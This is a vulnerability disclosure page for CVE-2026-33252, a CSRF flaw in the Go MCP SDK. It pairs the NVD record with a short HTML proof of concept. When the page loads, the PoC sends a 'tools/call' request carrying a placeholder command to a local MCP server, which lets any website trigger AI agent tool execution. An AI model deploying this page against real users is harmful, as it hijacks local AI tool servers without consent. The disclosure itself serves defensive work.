CVE-2026-33252

<!-- PoC for CVE-2026-33252: CSRF to trigger tool execution --> <html> <body> <script> function exploit() { const payload = JSON.stringify({ jsonrpc: "2.0", method: "tools/call", params: { name: "example_tool", arguments: { "command": "malicious_command" } }, id: 1 }); // Send request to local MCP server fetch('http://127.0.0.1:3000/mcp', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: payload }).then(response => console.log("Request sent")) .catch(error => console.error("Error", error)); } // Auto-trigger on load window.onload = exploit; </script> </body> </html>

{"cve": {"id": "CVE-2026-33252", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.017", "lastModified": "2026-04-15T16:33:12.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Go MCP SDK used Go's standard encoding/json. Prior to version 1.4.1, the Go SDK's Streamable HTTP transport accepted browser-generated cross-site `POST` requests without validating the `Origin` header and without requiring `Content-Type: application/json`. In deployments without Authorization, especially stateless or sessionless configurations, this allows an arbitrary website to send MCP requests to a local server and potentially trigger tool execution. Version 1.4.1 contains a patch for the issue."}, {"lang": "es", "value": "El SDK de Go MCP utilizaba el encoding/json estándar de Go. Antes de la versión 1.4.1, el transporte HTTP Streamable del SDK de Go aceptaba solicitudes 'POST' de sitio cruzado generadas por el navegador sin validar el encabezado 'Origin' y sin requerir 'Content-Type: application/json'. En implementaciones sin autorización, especialmente configuraciones sin estado o sin sesión, esto permite a un sitio web arbitrario enviar solicitudes MCP a un servidor local y potencialmente activar la ejecución de herramientas. La versión 1.4.1 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mcp_go_sdk:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "523AC61E-4F6E-4475-9CBE-F956F19ACA2A"}]}]}], "references": [{"url": "https://github.com/modelcontextprotocol/go-sdk/commit/a433a831d6e5d5ac3b9e625a8095aa8eaa040dfc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/modelcontextprotocol/go-sdk/security/advisories/GHSA-89xv-2j6f-qhc8", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}